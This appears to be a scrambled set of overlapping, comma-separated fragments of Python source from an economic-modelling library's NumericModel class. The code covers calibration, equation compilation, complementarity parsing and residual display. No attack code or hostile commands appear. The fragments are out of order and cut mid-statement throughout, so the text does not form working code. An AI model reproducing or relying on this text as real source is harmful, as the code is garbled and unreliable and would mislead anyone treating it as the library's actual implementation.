eqgroup, eqlist", "= self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from", "= spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False:", "self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None):", "in pname ] ) elif len(args)>0: pnames = (pname,) + args return self.get_calibration(pnames)", "= solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict)", "functions = {} original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys():", "spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue if", "dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration", "contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand", "g in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except: raise", "__init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum(", "auxdefs = {} for time in [-1,0,1]: dd = OrderedDict() for eq in", "can be either: - None - \"a<=expr\" where a is a controls -", "updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import", "calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from", "comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names =", "else {} self.infos['data_layout'] = 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec", "eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict()", "regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either: -", "lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args,", "len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname]", "= self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self,", "'{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return", "functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound", "for eqgroup in res.keys(): eqlist = self.symbolic.equations[eqgroup] ss += u\" {}\\n\".format(eqgroup) for i,", "comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names", "\"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # 
for", "dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula", "lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs", "from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state", "comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound,", "OrderedDict() for ag in arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t])", "res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val)", "prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd", "controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try: res", "lhs) eq = str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for", "= re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can be either: - None", "calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib = self.calibration return", "n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] =", "Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res]", "= None else: target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): #", "dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain = None else: self.markov_chain", "for g in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except:", "- file: \"{filename}\\n'''.format(**self.infos) ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup,", "'{}'\".format(comp)) res = [r.strip() for r in res] if res[1] != control: msg", "in res] if res[1] != control: msg = \"Complementarity condition '{}' incorrect. 
Expected", "self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq", "# import pprint # s += '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1)", "- \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try: res =", "return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname in self.symbols[g]]", "eqs] eqs = [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output =", "== 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None,", "= str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq)", "in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'):", "\"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups()", "import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes", "import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba", "condition '{}'\".format(comp)) res = [r.strip() for r in res] if res[1] != control:", "from dolo.misc.termcolor import colored s = u''' Model object: ------------ - name: \"{name}\"", "Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): #", "'{}' incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg) return [res[0],", "# eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1),", "? if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: #", "if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self):", "lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs)", "symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output", "from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works", "try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v", "isinstance(pname, list): return [ self.get_calibration(p) for p in pname ] elif isinstance(pname, tuple):", "for p in pname ] ) elif len(args)>0: pnames = (pname,) + args", "{}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8:", "time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs =", "else: return eq eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs']", "keep only right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs", "= [str.strip(eq) for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) #", "arg_names: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun =", "compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output 
=", "spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec", "arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output =", "calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is", "if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub]", "spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args", "equations as rhs - lhs def filter_equal(eq): if '=' in eq: lhs, rhs", "def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions", "comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]]", "def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb =", "# s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def", "# TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args =", "eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2]", "+= u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s", "in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i =", "= 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red')", "if 'auxiliaries' not in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs", "markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols =", "funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output", "# prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]:", "comp_spec['left-right'] comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|'", "= evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution", "spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The", "calibration = None calibration_dict = None covariances = None markov_chain = None def", "is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in", "return tuple( [ self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames", "raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def", "numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None: self.markov_chain = 
None else:", "in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in", "depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in", "# TODO: restore recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq", "'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t", "recursive definitions eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs", "= symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in self.symbols.items()", "colored s = u''' Model object: ------------ - name: \"{name}\" - type: \"{type}\"", "v def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ? if", "self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames = (pname,) +", "tuple( [ self.get_calibration(p) for p in pname ] ) elif len(args)>0: pnames =", "only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else:", "= self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc", "vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3}", "model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {}", "= eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp", "model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else: #", "eq = str.strip(eq) return eq else: return eq eqs = [filter_equal(eq) for eq", "a controls - \"expr<=a\" where a is a control - \"expr1<=a<=expr2\" ''' try:", "if distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain", "= None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self,", "comps = [] functions = {} original_functions = {} original_gufunctions = {} for", "= [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq:", "solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration", "original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def", "residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib", "None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is None:", "= group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i]", "self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist =", "= spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2] = 'out'", "+= \"\\n\" s += ss # import pprint # s += '- residuals:\\n'", "'=' in eq: lhs, rhs = str.split(eq,'=') eq = '{} - ( {}", "eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0]", 
"evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances = None else: self.covariances", "else ignore pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from", "fun_ub] else: return None def residuals(self, calib=None): if self.model_type == 'dtcscc': from dolo.algos.dtcscc.steady_state", "self.calibration return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler", "models only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type += '_'", "s += ss # import pprint # s += '- residuals:\\n' # s", "auxeqs = self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd = OrderedDict()", "**kwargs): # raise exception if unknown symbol ? if len(args)==2: pname, pvalue =", "comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = [] for", "= infos if infos is not None else {} self.infos['data_layout'] = 'columns' self.name", "fg models only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type +=", "eq: lhs, rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs)", "= spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs =", "eqs = self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq)", "self.symbolic.definitions # works for fg models only model_type = self.model_type if 'auxiliaries' not", "gu_upper_bound # rewrite all equations as rhs - lhs def filter_equal(eq): if '='", "+= pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self): if", "[] functions = {} original_functions = {} original_gufunctions = {} for funname in", "funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c n_output = len(eqs) original_functions[funname]", "try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition '{}'\".format(comp)) res", "comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound =", "len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] =", "# fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for", "in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return", "= ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound, gu_upper_bound", "*args): if isinstance(pname, list): return [ self.get_calibration(p) for p in pname ] elif", "eq else: return eq eqs = [filter_equal(eq) for eq in eqs] arg_names =", "[-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs", "ss = '\\n- residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items():", "self.symbols # should match self.symbols comps = [] functions = {} original_functions =", "get_calibration(self, pname, 
*args): if isinstance(pname, list): return [ self.get_calibration(p) for p in pname", "pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and", "fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if ag[0]", "{eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\" s += ss", "str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables, time) k", "discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances = distribution if distribution is None: self.covariances = None", "[] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control", "symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] =", "pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub'", "for fg models only model_type = self.model_type if 'auxiliaries' not in self.symbols: model_type", "= fun original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions =", "control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse", "comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs = [] for i,eq in", "exception if unknown symbol ? if len(args)==2: pname, pvalue = args if isinstance(pname,", "return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if", "'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec", "self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def", "complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res] if res[1] !=", "__str__(self): from dolo.misc.termcolor import colored s = u''' Model object: ------------ - name:", "StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols", "self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol", "TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right']", "[eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec", "options is not None else {} self.infos = infos if infos is not", "in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=')", "= None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain is", "self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol", "+= u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val)", "None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain]", "if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib =", "isinstance(pname, str): 
self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue calib = self.symbolic.calibration_dict", "self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read", "self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u''' Model", "None else {} self.infos = infos if infos is not None else {}", "== 'dtcscc': from dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc':", "= self.symbolic.equations[funname] eqs = [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for", "self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex =", "recipes from numba import njit class NumericModel: calibration = None calibration_dict = None", "lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all", "{} original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname", "is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition", "original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations", "in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for", "# comp can be either: - None - \"a<=expr\" where a is a", "target_spec[2] = 'out' else: target_spec = None if spec.get('complementarities'): # TODO: Rewrite and", "= self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s = u'''", "incorrect. Expected {} instead of {}.\".format(comp, control, res[1]) raise Exception(msg) return [res[0], res[2]]", "= recipes[model_type] symbols = self.symbols # should match self.symbols comps = [] functions", "def __str__(self): from dolo.misc.termcolor import colored s = u''' Model object: ------------ -", "functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control): ''' # comp can", "original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs -", "in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|')", "None calibration_dict = None covariances = None markov_chain = None def __init__(self, symbolic_model,", "symbol ? 
if len(args)==2: pname, pvalue = args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else:", "functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__ =", "args return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if pname in", "residuals:\\n\\n' res = self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in", "residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib)", "for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations: if", "= str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq)", "import eval_formula if calib is None: calib = self.calibration return eval_formula(expr, dataframe=dataframe, context=calib)", "compile_function_ast(eqs, symbols, arg_names, output_names=target_spec, funname=funname, definitions=ddefs, ) # print(\"So far so good !\")c", "print(\"So far so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] =", "infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e", "dolo.misc.termcolor import colored s = u''' Model object: ------------ - name: \"{name}\" -", "self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else:", "self.variables = sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')],", "if res[1] != control: msg = \"Complementarity condition '{}' incorrect. 
Expected {} instead", "n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] =", "= self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else: # prepare", "('parameters','shocks','values')], ()) self.options = options if options is not None else {} self.infos", "= 'columns' self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def", "str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs,", "good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output )", "collections import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple from", "= len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun", "s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property def x_bounds(self):", "= NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition", "symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution = evaluator.eval(self.symbolic.distribution) discrete_transition = evaluator.eval(self.symbolic.discrete_transition) covariances =", "lhs def filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq =", "auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols # should match self.symbols", "\"\\n\" s += ss # import pprint # s += '- residuals:\\n' #", "fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if", "dolo.algos.dtcscc.steady_state import residuals return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import", "= self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration", "self.symbolic.equations['auxiliary'] auxdefs = {} for time in [-1,0,1]: dd = OrderedDict() for eq", "= None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols", "should match self.symbols comps = [] functions = {} original_functions = {} original_gufunctions", "in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound", "{} for time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs: lhs,", "ast from collections import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift,", "= {} for time in [-1,0,1]: dd = OrderedDict() for eq in auxeqs:", "] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname ]", "self.symbols[g]] try: group = group[0] except: raise Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname)", "= zip(*comps) # fb_names = ['{}_lb'.format(funname), '{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs =", "self.symbols[group].index(pname) v = 
self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception", "= eq.replace('|', u\"\\u27C2\") ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq)", "= fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun", "far so good !\")c n_output = len(eqs) original_functions[funname] = fun functions[funname] = standard_function(gufun,", "== 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names,", "markov_chain is None: self.markov_chain = None else: self.markov_chain = [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab", "self.functions['controls_ub'] return [fun_lb, fun_ub] else: return None def residuals(self, calib=None): if self.model_type ==", "self.model_type if 'auxiliaries' not in self.symbols: model_type += '_' else: # prepare auxiliaries", "self.name = self.infos['name'] self.model_type = self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import", "!= control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead of {}.\".format(comp,", "= sum( [tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ())", "import residuals return residuals(self, calib) def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import", "enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals =", "time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd", "control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs,", "= {} original_functions = {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec", "def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ? if len(args)==2:", "pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for p in pname", "a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to", "from dolo.compiler.recipes import recipes from numba import njit class NumericModel: calibration = None", 